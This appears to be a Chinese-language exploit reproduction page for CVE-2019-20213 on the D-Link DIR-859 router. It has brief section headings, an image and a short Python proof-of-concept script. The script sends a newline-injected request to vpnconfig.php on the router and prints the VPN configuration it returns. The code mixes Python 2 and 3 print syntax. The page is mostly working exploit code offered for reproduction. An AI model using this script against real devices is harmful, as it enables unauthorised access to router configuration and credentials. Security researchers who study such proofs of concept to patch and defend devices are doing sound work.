# (CVE-2019–20213)D-Link DIR-859 rce
## 二、漏洞影响
![image](/static/qingy/(CVE-2019–20213)D-Link_DIR-859_rce/img/6-20201014111625558.png)
## 三、复现过程
“`
import requests
# Miguel Mendez Z.
FILES = [“vpnconfig.php”]
IP = “192.168.0.1”
PORT = “80”
headers = {‘content-type’: ‘application/x-www-form-urlencoded’}
print “\n———–VPN————-\n”
url_vpn = ‘http://{ip}:{port}/{file1}?pwnd=%0a’.format(ip=IP, port=PORT, file1=FILES[0])
print(requests.get(url_vpn).text)
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容